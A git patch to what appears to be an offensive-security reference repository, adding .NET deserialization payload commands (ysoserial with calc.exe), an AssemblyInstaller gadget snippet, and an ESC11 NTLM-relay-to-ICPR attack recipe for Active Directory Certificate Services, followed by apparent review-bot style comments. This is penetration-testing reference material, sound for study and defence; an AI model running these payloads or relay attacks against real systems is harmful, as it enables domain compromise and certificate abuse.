From cbb2137f3b1300f5743b8026e0fabd3f964acde6 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 21 Nov 2022 10:48:27 +0100 Subject: [PATCH] ESC11 - Relay NTLM to ICPR --- Insecure Deserialization/DotNET.md | 31 ++++++++++++++++--- .../Active Directory Attack.md | 18 ++++++++++- 2 files changed, 44 insertions(+), 5 deletions(-) diff --git a/Insecure Deserialization/DotNET.md b/Insecure Deserialization/DotNET.md index d5f014be..1dbc23d0 100644 --- a/Insecure Deserialization/DotNET.md +++ b/Insecure Deserialization/DotNET.md @@ -5,10 +5,12 @@ * [Detection](#detection) * [Tools](#tools) * [Formatters](#formatters) - * [XmlSerializer](#) - * [DataContractSerializer](#) - * [JSON.NET](#) - * [BinaryFormatter](#) + * [XmlSerializer](#xmlserializer) + * [DataContractSerializer](#datacontractserializer) + * [NetDataContractSerializer](#netdatacontractserializer) + * [LosFormatter](#losformatter) + * [JSON.NET](#jsonnet) + * [BinaryFormatter](#binaryformatter) * [POP Gadgets](#pop-gadgets) * [References](#references) @@ -73,6 +75,8 @@ $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t ### NetDataContractSerializer +> It extends the `System.Runtime.Serialization.XmlObjectSerializer` class and is capable of serializing any type annotated with serializable attribute as `BinaryFormatter`. + * In C# source code, look for `NetDataContractSerializer().ReadObject()`. * Payload output: **XML** @@ -80,6 +84,14 @@ $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t .\ysoserial.exe -f NetDataContractSerializer -g TypeConfuseDelegate -c "calc.exe" -o base64 -t ``` +### LosFormatter + +* Use `BinaryFormatter` internally. + +```ps1 +.\ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -c "calc.exe" -o base64 -t +``` + ### JSON.NET 
@@ -132,6 +144,17 @@ List of popular gadgets used in common payloads. ```cs ExpandedWrapper myExpWrap = new ExpandedWrapper(); ``` +* **System.Configuration.Install.AssemblyInstaller** + * Execute payload with Assembly.Load + ```cs + // System.Configuration.Install.AssemblyInstaller + public void set_Path(string value){ + if (value == null){ + this.assembly = null; + } + this.assembly = Assembly.LoadFrom(value); + } + ``` ## References diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index c8d6f663..9088d15d 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -85,6 +85,7 @@ - [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control) - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) - [ESC9 - No Security Extension](#esc9---no-security-extension) + - [ESC11 - Relaying NTLM to ICPR](#esc11---relaying-ntlm-to-icpr) - [Certifried CVE-2022-26923](#certifried-cve-2022-26923) - [Pass-The-Certificate](#pass-the-certificate) - [Active Directory Federation Services](#active-directory-federation-services) 
@@ -2589,6 +2590,20 @@ Jane@corp.local is allowed to enroll in the certificate template ESC9 that speci # Add -domain to your command line since there is no domain specified in the certificate. ``` +#### ESC11 - Relaying NTLM to ICPR + +> Encryption is not enforced for ICPR requests and Request Disposition is set to Issue + +Requirements: +* [sploutchy/Certipy](https://github.com/sploutchy/Certipy) - Certipy fork +* [sploutchy/impacket](https://github.com/sploutchy/impacket) - Impacket fork + +Exploitation: +1. Look for `Enforce Encryption for Requests: Disabled` in `certipy find -u user@dc1.lab.local -p 'REDACTED' -dc-ip 10.10.10.10 -stdout` output +2. Setup a relay using Impacket ntlmrelay and trigger a connection to it. + ```ps1 + ntlmrelayx.py -t rpc://10.10.10.10 -rpc-mode ICPR -icpr-ca-name lab-DC-CA -smb2support + ``` #### Certifried CVE-2022-26923 @@ -4105,4 +4120,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html) * [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/) * [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability) -* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/) \ No newline at end of file +* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/) +* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/) \ No newline at end of file
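Review bot: the new blockquote in the `NetDataContractSerializer` hunk (`@@ -73,6 +75,8 @@`) is unattributed and its last clause is ungrammatical. If the sentence is a quotation, add the source link after it; if it is the author's own wording, drop the `>` marker. Either way, "capable of serializing any type annotated with serializable attribute as `BinaryFormatter`" should read "capable of serializing any type annotated with the Serializable attribute, just like `BinaryFormatter`", so the comparison is unambiguous.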
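Review bot: the `LosFormatter` section in the `@@ -80,6 +84,14 @@` hunk is missing the detection and output lines that the neighbouring formatter sections carry, and `* Use `BinaryFormatter` internally.` should be `* Uses `BinaryFormatter` internally.`. The `NetDataContractSerializer` section just above shows the pattern: add a `* In C# source code, look for `LosFormatter().Deserialize()`.` bullet and a `* Payload output:` line, so a reader auditing code knows what to search for rather than only how to generate a payload.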
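Review bot: in the `AssemblyInstaller` gadget hunk (`@@ -132,6 +144,17 @@`) the bullet says `Execute payload with Assembly.Load` while the code calls `Assembly.LoadFrom(value)`; make the bullet say `Assembly.LoadFrom`, since the two methods take different arguments and the difference is the whole point of the gadget. The snippet should also say in its comment that it is the decompiled `Path` property setter of `System.Configuration.Install.AssemblyInstaller` (`set_Path` is the compiler-generated name), and note that the `if (value == null)` branch deliberately falls through to `Assembly.LoadFrom(value)` as in the framework source, otherwise readers will take the missing `return`/`else` for a transcription error. Unlike the `ExpandedWrapper` entry above it, this entry carries no description of how the gadget is reached during deserialization.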
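Review bot: the ESC11 hunk (`@@ -2589,6 +2590,20 @@`) has three problems. First, the `certipy find` command passes `-u user@dc1.lab.local`; Certipy's `-u` argument is `user@domain`, and the DC is already given by `-dc-ip 10.10.10.10`, so this should read `-u user@lab.local` (verify against the fork's usage text). Second, the `ntlmrelayx.py` fence is tagged `ps1`, but it is a Python tool normally run from a Linux shell; tag it `bash` so the block is not mistaken for PowerShell. Third, the section names the vulnerable condition (`Enforce Encryption for Requests: Disabled`) but not the fix; a one-line remediation, enabling `Enforce Encryption for Requests` on the CA (the `IF_ENFORCEENCRYPTICERTREQUEST` interface flag), would make the entry useful to defenders reading the same page. Step 2 also says "trigger a connection to it" without pointing anywhere; link to the existing `ESC8 - AD CS Relay Attack` section in this file rather than leaving the step dangling.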
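Review bot: the new reference in the last hunk (`@@ -4105,4 +4120,5 @@`) is written in all caps as `NOVEMBER 16, 2022 - SYLVAIN HEINIGER`, unlike the neighbouring entries which use normal casing and the `Title - Author - Date` order; normalise it to `Relaying to AD Certificate Services over RPC - Sylvain Heiniger - November 16, 2022`. The file also still ends without a trailing newline (`\ No newline at end of file` on both sides); adding one here avoids a noisy diff on the next edit.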